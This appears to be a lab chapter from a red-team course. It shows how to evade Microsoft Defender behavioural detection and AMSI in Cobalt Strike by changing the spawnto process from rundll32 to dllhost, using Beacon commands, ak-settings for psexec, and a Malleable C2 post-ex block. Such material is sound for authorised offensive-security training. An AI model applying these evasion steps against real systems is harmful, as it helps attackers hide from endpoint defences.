Behavioural Detections

When dealing with behavioural detections, the Defender alerts look something like this:

PSComputerName                 : fs
ProcessName                    : C:\Windows\System32\rundll32.exe
RemediationTime                : 9/14/2022 5:40:03 PM
Resources                      : {behavior:_pid:4964:111820579542652, 
                                 process:_pid:4040,ProcessStart:133076508002529669, 
                                 process:_pid:4964,ProcessStart:133076507626927382}

\

The Beacon running on the file server is living inside the rundll32 process (PID 4404). When Cobalt Strike runs a post-ex command that uses the "fork & run" pattern, it will spawn a sacrificial process, inject the post-ex capability into it, retrieve the output over a named pipe, and then kills the process. The primary reason to do this is to ensure that "unstable" post-ex tools don't crash the Beacon.

\

\

rundll32 being the default "spawnto" for Cobalt Strike has been a thing for a long time and is now a common point of detection. The service binary payload used by psexec also uses this by default, which is why you see those Beacons running as rundll32.exe.

The process used for post-ex commands and psexec can be changed on the fly in the CS GUI. To change the post-ex process, use the spawnto command. x86 and x64 must be specified individually and environment variables can also be used.

beacon> spawnto x64 %windir%\sysnative\dllhost.exe
beacon> spawnto x86 %windir%\syswow64\dllhost.exe

The sysnative and syswow64 paths should be used rather than system32.

\

If we then use powerpick to get its own process name, it will return dllhost.

beacon> powerpick Get-Process -Id $pid | select ProcessName

ProcessName
-----------
dllhost    

\

powerpick + PowerView will now run on the file server without being caught by AMSI or this behavioural detection.

beacon> run hostname
fs

beacon> powershell-import C:\Tools\PowerSploit\Recon\PowerView.ps1
beacon> powerpick Get-Domain

Forest                  : cyberbotic.io
DomainControllers       : {dc-2.dev.cyberbotic.io}
Children                : {}
DomainMode              : Unknown
DomainModeLevel         : 7
Parent                  : cyberbotic.io
PdcRoleOwner            : dc-2.dev.cyberbotic.io
RidRoleOwner            : dc-2.dev.cyberbotic.io
InfrastructureRoleOwner : dc-2.dev.cyberbotic.io
Name                    : dev.cyberbotic.io

\

Use the spawnto command without any argument to reset back to default.

beacon> spawnto
[*] Tasked beacon to spawn features to default process

\

To change the spawnto used by psexec, use the ak-settings command.

beacon> ak-settings spawnto_x64 C:\Windows\System32\dllhost.exe
[*] Updating the spawnto_x64 process to 'C:\Windows\System32\dllhost.exe'
[*] artifact kit settings:
[*]    service     = ''
[*]    spawnto_x86 = 'C:\Windows\SysWOW64\rundll32.exe'
[*]    spawnto_x64 = 'C:\Windows\System32\dllhost.exe'

beacon> ak-settings spawnto_x86 C:\Windows\SysWOW64\dllhost.exe
[*] Updating the spawnto_x86 process to 'C:\Windows\SysWOW64\dllhost.exe'
[*] artifact kit settings:
[*]    service     = ''
[*]    spawnto_x86 = 'C:\Windows\SysWOW64\dllhost.exe'
[*]    spawnto_x64 = 'C:\Windows\System32\dllhost.exe'

The Artifact Kit does not support the use of environment variables by default. You may also change the name of the service (rather than 7 random characters) with ak-settings service [name].

\

Lateral movement with psexec will then land us in dllhost.exe.

\

\

The default spawnto can be changed inside Malleable C2 by including the spawnto_x64 and spawnto_x86 directives inside the post-ex block.

post-ex {
        set amsi_disable "true";

        set spawnto_x64 "%windir%\\sysnative\\dllhost.exe";
        set spawnto_x86 "%windir%\\syswow64\\dllhost.exe";
}